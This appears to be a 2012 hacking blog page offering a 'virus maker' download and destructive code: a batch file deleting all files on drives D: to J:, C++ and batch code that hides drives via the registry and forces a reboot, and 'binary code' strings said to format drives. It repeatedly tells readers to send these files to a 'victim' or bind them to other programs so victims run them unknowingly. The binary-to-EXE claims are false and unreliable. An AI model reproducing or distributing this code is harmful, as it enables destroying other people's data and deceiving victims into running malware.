Pages

Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Wednesday, 25 July 2012

Free Virus Maker : How to Create a Virus using Virus Creator

Previously, we talked about Viruses and Keyloggers used to hack various online email, social networks accounts & internet banking, credit & debit card no. with full information. In this article, I am posting a Virus Maker software which you can use as Virus creator to create a virus and try them out on your friend's computers. This Virus Maker software is very easy to use. Simply read on this article to know how to create a virus using Virus Maker. I have provided the link for software download... just read on.



Virus Maker to create a Virus: -


Virus maker is a simple tool used to create a virus. You have to simply inform about the nature of virus you want to create and this Virus Maker software simply does the job of creating a virus for you. The virus file can be outputted in .bat format. With the help of this Virus maker, you can:

- Disable scheduled tasks
- Create multiple users
- Corrupt system files
- Open 10 cmd windows
- Open multiple webpages (really annoying feature).
- Reset computer clock
and much more.


How to create a Virus???


1. Free Download Virus creator software to create a virus.
Password: TRICKS4INDYA
2. Now, run Virus Creator file (works perfectly on Windows XP and Windows Vista) to see:



3. Simply enter the nature of the virus you want to create in "yes" or "no" form.

4. Once, you have completed the process, you will find a virus file saved at your desired location. Now, when you have this virus file, its time to spread it or use it on your victim's computer.

5. You can use Batch to Exe converter to convert this virus to .exe format. Then, use a Binder software to bind this virus file with a .exe file so that victim unknowingly runs this virus file and gets infected. I will post Batch to Exe converter and Binder software very soon.

Note: Do not try the virus on your own computer. If you want to try the virus, use Deep Freeze 6 software to prevent any possible harm to your computer.

So friends, I hope now you will be able to create a virus using this Virus Maker software. I have tried to make this tutorial on how to create virus simplest as possible. If you have any problem in this tutorial on how to create a virus using Virus Maker software, please mention it in comments.

Enjoy Virus maker software to create virus...




Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

If u like then ple follow my blog & also help to promote. Don’t forget to leave comment.

Make a dangerous virus using notepad

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus 

 Make it or download the file from here -> batch file virus

Tuesday, 24 July 2012

Virus Codes to Disable All hard disks

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.


C++ Virus Code :
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself. 
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.



Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

Dangerous Binary code Virus

A simple binary codes that can format the system drive ,secondary drives… 
Copy The Following In Notepad Exactly as it
01001011000111110010010101010101010000011111100000 
Save As An EXE Any Name Will Do
Send the EXE to People And Infect
Some other interesting formatting codes….
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your drive d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100 
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100 
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001 
00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001